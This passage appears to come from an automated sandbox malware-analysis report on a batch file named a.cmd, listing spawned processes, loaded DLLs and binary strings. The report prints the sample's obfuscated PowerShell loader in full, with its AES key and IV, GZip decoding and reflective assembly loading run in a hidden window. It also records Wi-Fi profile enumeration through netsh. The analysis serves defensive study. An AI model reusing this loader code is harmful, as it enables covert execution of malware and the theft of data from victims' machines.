6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: 9.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1736352605.000001D03983A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1736352605.000001D039806000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbOLtu source: powershell.exe, 00000008.00000002.1737721152.000001D039BA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
